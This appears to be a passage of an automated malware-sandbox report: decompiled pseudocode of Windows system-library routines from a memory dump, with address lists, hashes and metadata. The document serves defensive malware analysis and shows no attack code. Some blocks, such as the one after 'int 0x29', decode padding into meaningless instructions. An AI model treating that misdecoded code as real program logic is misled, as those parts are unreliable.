								if(_a8 != 0) {
									_t278 = E018939F2(_t326);
									_t313 = _v32;
									_t326 = _t278;
								}
							}
							_t297 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t332 = _v68;
								__eflags = 0;
								 *((short*)(_t326 - 2)) = 0;
								goto L32;
							} else {
								_t284 = _t331 + _t286 * 4;
								_v56 = _t284;
								do {
									__eflags = _t313;
									if(_t313 != 0) {
										_t241 =  *(_v60 + _t297 * 4);
										__eflags = _t241;
										if(_t241 == 0) {
											goto L30;
										} else {
											__eflags = _t241 == 5;
											if(_t241 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t284 =  *(_v60 + _t297 * 4);
										 *(_t284 + 0x18) = _t326;
										_t245 =  *(_v60 + _t297 * 4);
										__eflags = _t245 - 8;
										if(_t245 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t245 * 4 +  &M01832959))) {
												case 0:
													__ax =  *0x18f8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0184F3E0(__edi,  *0x18f848c, __ax & 0x0000ffff);
														__eax =  *0x18f8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0184F3E0(_t326, _v80, _v64);
													_t273 = _v64;
													goto L26;
												case 2:
													 *0x18f8480 & 0x0000ffff = E0184F3E0(__edi,  *0x18f8484,  *0x18f8480 & 0x0000ffff);
													__eax =  *0x18f8480 & 0x0000ffff;
													__eax = ( *0x18f8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0184F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0184F3E0(_t326, _v76, _v36);
														_t273 = _v36;
													}
													L26:
													_t340 = _t340 + 0xc;
													_t326 = _t326 + (_t273 >> 1) * 2 + 2;
													__eflags = _t326;
													L27:
													_push(0x3b);
													_pop(_t275);
													 *((short*)(_t326 - 2)) = _t275;
													goto L28;
												case 6:
													__ebx =  *0x18f575c;
													__eflags = __ebx - 0x18f575c;
													if(__ebx != 0x18f575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0184F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x18f575c;
														} while (__ebx != 0x18f575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x18f8478 & 0x0000ffff = E0184F3E0(__edi,  *0x18f847c,  *0x18f8478 & 0x0000ffff);
													__eax =  *0x18f8478 & 0x0000ffff;
													__eax = ( *0x18f8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E018939F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x18f6e58 & 0x0000ffff = E0184F3E0(__edi,  *0x18f6e5c,  *0x18f6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x18f6e58 & 0x0000ffff;
													__eax = ( *0x18f6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t297 = _v16;
													_t313 = _v32;
													L29:
													_t284 = _t284 + 4;
													__eflags = _t284;
													_v56 = _t284;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t297 = _t297 + 1;
									_v16 = _t297;
									__eflags = _t297 - _v48;
								} while (_t297 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t245 =  *(_v60 + _t324 * 4);
						if(_t245 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t245 * 4 +  &M01832935))) {
							case 0:
								__ax =  *0x18f8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t313 =  &_v64;
								_v80 = E01832E3E(0,  &_v64);
								_t284 = _t284 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x18f8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x18f8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0181EEF0(0x18f79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0181EB70(__ecx, 0x18f79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t219 = _v72;
											__eflags = _t219;
											if(_t219 != 0) {
												L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
											}
											_t220 = _v52;
											__eflags = _t220;
											if(_t220 != 0) {
												__eflags = _t332;
												if(_t332 < 0) {
													L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t220);
													_t220 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t293 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x18f7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01824620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0181EB70(__ecx, 0x18f79a0);
										__eax = _v52;
										L36:
										_pop(_t325);
										_pop(_t333);
										__eflags = _v8 ^ _t337;
										_pop(_t285);
										return E0184B640(_t220, _t285, _v8 ^ _t337, _t313, _t325, _t333);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t280 = _v56;
								if(_v56 != 0) {
									_t313 =  &_v36;
									_t282 = E01832E3E(_t280,  &_v36);
									_t293 = _v36;
									_v76 = _t282;
								}
								if(_t293 == 0) {
									goto L44;
								} else {
									_t284 = _t284 + 2 + _t293;
								}
								goto L14;
							case 6:
								__eax =  *0x18f5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x18f8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x18f8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x18f6e58 & 0x0000ffff;
								__eax = ( *0x18f6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t324 = _t324 + 1;
								if(_t324 >= _v48) {
									goto L16;
								} else {
									_t313 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t298 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t298 =  *_t298 + 0x66;
					 *((intOrPtr*)(_t284 - 0x7cd81fff)) =  *((intOrPtr*)(_t284 - 0x7cd81fff)) - _t245;
					 *_t331 =  *_t331 + _t337;
					 *[es:ecx] =  *[es:ecx] + 0x46;
					 *((intOrPtr*)(_t284 - 0x7cd9faff)) =  *((intOrPtr*)(_t284 - 0x7cd9faff)) - _t245;
					 *_t326 =  *_t326 + _t284;
					_pop(_t288);
					 *_t298 = _t245;
					_t247 = _t340;
					 *((intOrPtr*)(_t288 - 0x78a4caff)) =  *((intOrPtr*)(_t288 - 0x78a4caff)) - _t247;
					 *_t313 =  *_t313 + _t247;
					 *((intOrPtr*)(_t288 - 0x7cd77fff)) =  *((intOrPtr*)(_t288 - 0x7cd77fff)) - _t247;
					_t334 = _t331 + _t331;
					asm("daa");
					 *_t298 =  *_t298 + 0x1e;
					 *((intOrPtr*)(_t288 - 0x7cd7b1ff)) =  *((intOrPtr*)(_t288 - 0x7cd7b1ff)) - _t247;
					_a35 = _a35 + _t288;
					 *_t298 =  *_t298 + 0xffffffd8;
					_pop(_t289);
					 *_t298 = _t247;
					 *_t298 =  *_t298 + 0x34;
					_pop(_t343);
					 *_t298 = 0x28;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x18dff00);
					E0185D08C(_t289, _t326, _t334);
					_v44 =  *[fs:0x18];
					_t327 = 0;
					 *_a24 = 0;
					_t290 = _a12;
					__eflags = _t290;
					if(_t290 == 0) {
						_t253 = 0xc0000100;
					} else {
						_v8 = 0;
						_t335 = 0xc0000100;
						_v52 = 0xc0000100;
						_t255 = 4;
						while(1) {
							_v40 = _t255;
							__eflags = _t255;
							if(_t255 == 0) {
								break;
							}
							_t303 = _t255 * 0xc;
							_v48 = _t303;
							__eflags = _t290 -  *((intOrPtr*)(_t303 + 0x17e1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t270 = E0184E5C0(_a8,  *((intOrPtr*)(_t303 + 0x17e1668)), _t290);
									_t343 = _t343 + 0xc;
									__eflags = _t270;
									if(__eflags == 0) {
										_t335 = E018851BE(_t290,  *((intOrPtr*)(_v48 + 0x17e166c)), _a16, _t327, _t335, __eflags, _a20, _a24);
										_v52 = _t335;
										break;
									} else {
										_t255 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t255 = _t255 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t335;
						__eflags = _t335;
						if(_t335 < 0) {
							__eflags = _t335 - 0xc0000100;
							if(_t335 == 0xc0000100) {
								_t299 = _a4;
								__eflags = _t299;
								if(_t299 != 0) {
									_v36 = _t299;
									__eflags =  *_t299 - _t327;
									if( *_t299 == _t327) {
										_t335 = 0xc0000100;
										goto L76;
									} else {
										_t315 =  *((intOrPtr*)(_v44 + 0x30));
										_t257 =  *((intOrPtr*)(_t315 + 0x10));
										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t299;
										if( *((intOrPtr*)(_t257 + 0x48)) == _t299) {
											__eflags =  *(_t315 + 0x1c);
											if( *(_t315 + 0x1c) == 0) {
												L106:
												_t335 = E01832AE4( &_v36, _a8, _t290, _a16, _a20, _a24);
												_v32 = _t335;
												__eflags = _t335 - 0xc0000100;
												if(_t335 != 0xc0000100) {
													goto L69;
												} else {
													_t327 = 1;
													_t299 = _v36;
													goto L75;
												}
											} else {
												_t260 = E01816600( *(_t315 + 0x1c));
												__eflags = _t260;
												if(_t260 != 0) {
													goto L106;
												} else {
													_t299 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t335 = E01832C50(_t299, _a8, _t290, _a16, _a20, _a24, _t327);
											L76:
											_v32 = _t335;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0181EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t335 = _a24;
									_t267 = E01832AE4( &_v36, _a8, _t290, _a16, _a20, _t335);
									_v32 = _t267;
									__eflags = _t267 - 0xc0000100;
									if(_t267 == 0xc0000100) {
										_v32 = E01832C50(_v36, _a8, _t290, _a16, _a20, _t335, 1);
									}
									_v8 = _t327;
									E01832ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t253 = _t335;
					}
					L70:
					return E0185D0D1(_t253);
				}
				L108:
			}

0x01832584
0x01832586
0x01832590
0x01832596
0x01832597
0x01832598
0x01832599
0x0183259e
0x018325a4
0x018325a9
0x018325ac
0x018325ae
0x018325b1
0x018325b2
0x018325b5
0x018325b8
0x018325bb
0x018325bc
0x018325bf
0x018325c2
0x018325c5
0x018325c6
0x018325cb
0x018325ce
0x018325d8
0x018325dd
0x018325de
0x018325e1
0x018325e3
0x018325e9
0x018326da
0x018326da
0x018326dd
0x018326e2
0x01875b56
0x00000000
0x018326e8
0x018326f9
0x018326fb
0x018326fe
0x01832700
0x01875b60
0x00000000
0x01832706
0x01832706
0x0183270a
0x0183270a
0x0183270d
0x01832713
0x01832716
0x01832718
0x0183271c
0x0183271e
0x01875b6c
0x01875b6f
0x01875b7f
0x01875b89
0x01875b8e
0x01875b93
0x01875b96
0x01875b9c
0x01875ba0
0x01875ba3
0x01875bab
0x01875bb0
0x01875bb3
0x01875bb3
0x01875ba3
0x01832724
0x01832726
0x01832729
0x0183272c
0x0183279d
0x0183279d
0x018327a0
0x018327a2
0x00000000
0x0183272e
0x0183272e
0x01832731
0x01832734
0x01832734
0x01832736
0x01875bc1
0x01875bc1
0x01875bc4
0x00000000
0x01875bca
0x01875bca
0x01875bcd
0x00000000
0x01875bd3
0x00000000
0x01875bd3
0x01875bcd
0x0183273c
0x0183273c
0x01832742
0x01832747
0x0183274a
0x0183274d
0x01832750
0x00000000
0x01832756
0x01832756
0x00000000
0x01832902
0x01832908
0x0183290b
0x00000000
0x01832911
0x0183291c
0x01832921
0x00000000
0x01832921
0x00000000
0x00000000
0x01832880
0x01832887
0x0183288c
0x00000000
0x00000000
0x01832805
0x0183280a
0x01832814
0x01832816
0x00000000
0x00000000
0x0183281e
0x01832821
0x01832823
0x00000000
0x01832829
0x01832829
0x01832831
0x0183283c
0x0183283e
0x00000000
0x0183283e
0x00000000
0x00000000
0x0183284e
0x01832850
0x01832851
0x01832854
0x01832857
0x0183285a
0x0183285c
0x0183285d
0x00000000
0x00000000
0x0183275d
0x01832761
0x00000000
0x01832767
0x0183276e
0x01832773
0x01832773
0x01832776
0x01832778
0x0183277e
0x0183277e
0x01832781
0x01832781
0x01832783
0x01832784
0x00000000
0x00000000
0x01875bd8
0x01875bde
0x01875be4
0x01875be6
0x01875be8
0x01875be9
0x01875bee
0x01875bf8
0x01875bff
0x01875c01
0x01875c04
0x01875c07
0x01875c0b
0x01875c0d
0x01875c0d
0x01875c15
0x01875c18
0x01875c1b
0x01875c1b
0x01875c1e
0x00000000
0x00000000
0x018328c3
0x018328c8
0x018328d2
0x018328d4
0x018328d8
0x018328db
0x01875c26
0x01875c28
0x01875c2d
0x01875c2d
0x00000000
0x00000000
0x01875c34
0x01875c36
0x01875c49
0x01875c4e
0x01875c54
0x01875c5b
0x01875c5d
0x01875c60
0x01832788
0x01832788
0x0183278b
0x0183278e
0x0183278e
0x0183278e
0x01832791
0x00000000
0x00000000
0x01832756
0x01832750
0x00000000
0x01832794
0x01832794
0x01832795
0x01832798
0x01832798
0x00000000
0x01832734
0x0183272c
0x01832700
0x018325ef
0x018325ef
0x018325ef
0x018325f2
0x018325f8
0x00000000
0x00000000
0x018325fe
0x00000000
0x018328e6
0x018328ec
0x018328ef
0x018328f5
0x018328f8
0x018328f8
0x00000000
0x018328f8
0x00000000
0x00000000
0x01832866
0x01832866
0x01832876
0x01832879
0x00000000
0x00000000
0x018327e0
0x018327e7
0x018327e9
0x018327eb
0x01875afd
0x00000000
0x01875afd
0x00000000
0x00000000
0x01832633
0x01832638
0x0183263b
0x0183263c
0x0183263e
0x01832640
0x01832642
0x01832647
0x01832649
0x0183264e
0x01832650
0x01832653
0x01832659
0x018326a2
0x018326a7
0x018326ac
0x018326b2
0x01875b11
0x01875b15
0x01875b17
0x00000000
0x018326b8
0x018326b8
0x018326ba
0x018327a6
0x018327a6
0x018327a9
0x018327ab
0x018327b9
0x018327b9
0x018327be
0x018327c1
0x018327c3
0x018327c5
0x018327c7
0x01875c74
0x01875c79
0x01875c79
0x018327c7
0x00000000
0x018326c0
0x018326c0
0x018326c3
0x018326c6
0x018326c6
0x018326c9
0x018326c9
0x00000000
0x018326c9
0x018326ba
0x0183265b
0x0183265b
0x0183265e
0x01832667
0x0183266d
0x01832677
0x0183267c
0x0183267f
0x01832681
0x01875b49
0x01875b4e
0x018327cd
0x018327d0
0x018327d1
0x018327d2
0x018327d4
0x018327dd
0x01832687
0x01832687
0x0183268a
0x0183268b
0x0183268e
0x0183268f
0x01832691
0x01832696
0x01832698
0x0183269d
0x0183269f
0x00000000
0x0183269f
0x01832681
0x00000000
0x00000000
0x01832846
0x00000000
0x00000000
0x01832605
0x0183260a
0x0183260c
0x01832611
0x01832616
0x01832619
0x01832619
0x0183261e
0x00000000
0x01832624
0x01832627
0x01832627
0x00000000
0x00000000
0x01875b1f
0x00000000
0x00000000
0x01832894
0x0183289b
0x0183289d
0x018328a1
0x01875b2b
0x01875b2e
0x01875b2e
0x018328a7
0x018328a9
0x01875b04
0x01875b09
0x01875b09
0x01875b09
0x00000000
0x00000000
0x01875b35
0x01875b3c
0x018328fb
0x018328fb
0x018326cc
0x018326cc
0x018326d0
0x00000000
0x018326d2
0x018326d2
0x00000000
0x018326d2
0x00000000
0x00000000
0x018325fe
0x0183292d
0x0183292f
0x01832930
0x01832935
0x01832937
0x0183293a
0x01832940
0x01832942
0x01832946
0x0183294c
0x0183294e
0x0183294f
0x01832951
0x01832952
0x01832958
0x0183295a
0x01832960
0x01832962
0x01832963
0x01832966
0x0183296c
0x0183296f
0x01832972
0x01832973
0x01832977
0x0183297a
0x0183297b
0x0183297d
0x0183297e
0x0183297f
0x01832980
0x01832981
0x01832982
0x01832983
0x01832984
0x01832985
0x01832986
0x01832987
0x01832988
0x01832989
0x0183298a
0x0183298b
0x0183298c
0x0183298d
0x0183298e
0x0183298f
0x01832990
0x01832992
0x01832997
0x018329a3
0x018329a6
0x018329ab
0x018329ad
0x018329b0
0x018329b2
0x01875c80
0x018329b8
0x018329b8
0x018329bb
0x018329c0
0x018329c5
0x018329c6
0x018329c6
0x018329c9
0x018329cb
0x00000000
0x00000000
0x018329cd
0x018329d0
0x018329d9
0x018329db
0x018329dd
0x01832a7f
0x01832a84
0x01832a87
0x01832a89
0x01875ca1
0x01875ca3
0x00000000
0x01832a8f
0x01832a8f
0x00000000
0x01832a8f
0x00000000
0x018329e3
0x018329e3
0x018329e3
0x00000000
0x018329e3
0x018329dd
0x00000000
0x018329db
0x018329e6
0x018329e9
0x018329eb
0x018329ed
0x018329f3
0x018329f5
0x018329f8
0x018329fa
0x01832a97
0x01832a9a
0x01832a9d
0x01832add
0x00000000
0x01832a9f
0x01832aa2
0x01832aa5
0x01832aa8
0x01832aab
0x01875cab
0x01875caf
0x01875cc5
0x01875cda
0x01875cdc
0x01875cdf
0x01875ce5
0x00000000
0x01875ceb
0x01875ced
0x01875cee
0x00000000
0x01875cee
0x01875cb1
0x01875cb4
0x01875cb9
0x01875cbb
0x00000000
0x01875cbd
0x01875cbd
0x00000000
0x01875cbd
0x01875cbb
0x01832ab1
0x01832ab1
0x01832ac4
0x01832ac6
0x01832ac6
0x00000000
0x01832ac6
0x01832aab
0x00000000
0x01832a00
0x01832a09
0x01832a0e
0x01832a21
0x01832a24
0x01832a35
0x01832a3a
0x01832a3d
0x01832a42
0x01832a59
0x01832a59
0x01832a5c
0x01832a5f
0x01832a5f
0x018329fa
0x018329f3
0x01832a64
0x01832a64
0x01832a6b
0x01832a6b
0x01832a6d
0x01832a72
0x01832a72
0x00000000

Strings

PATH, xrefs: 01832642, 01832691

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 5d291766f17c0ce20515b3cd200e83fd5040a862d82fc8be4f817b08f5022457
Instruction ID: d7eac77c23ce826adf0882a55e5676d30579493c8a4a39d8bb33fe21d5f25eb0
Opcode Fuzzy Hash: 5d291766f17c0ce20515b3cd200e83fd5040a862d82fc8be4f817b08f5022457
Instruction Fuzzy Hash: CFC17171E002199BDB25DF9DD881BBDBBB6FF98744F184019E901EB250E7349A41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0183FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0183FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0181EEF0(0x18f7b60);
					_t134 =  *0x18f7b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x18f7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x18f7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01816D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E018176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E018A8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0180B150();
													}
													_t116 = E018A6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E018175CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x18f8638; // 0x0
																	_t122 = L018138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E018176E2(_t154);
																			goto L41;
																		}
																	} else {
																		E018176E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0183FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L018170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0183FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0183FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0183FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0183FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0183FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
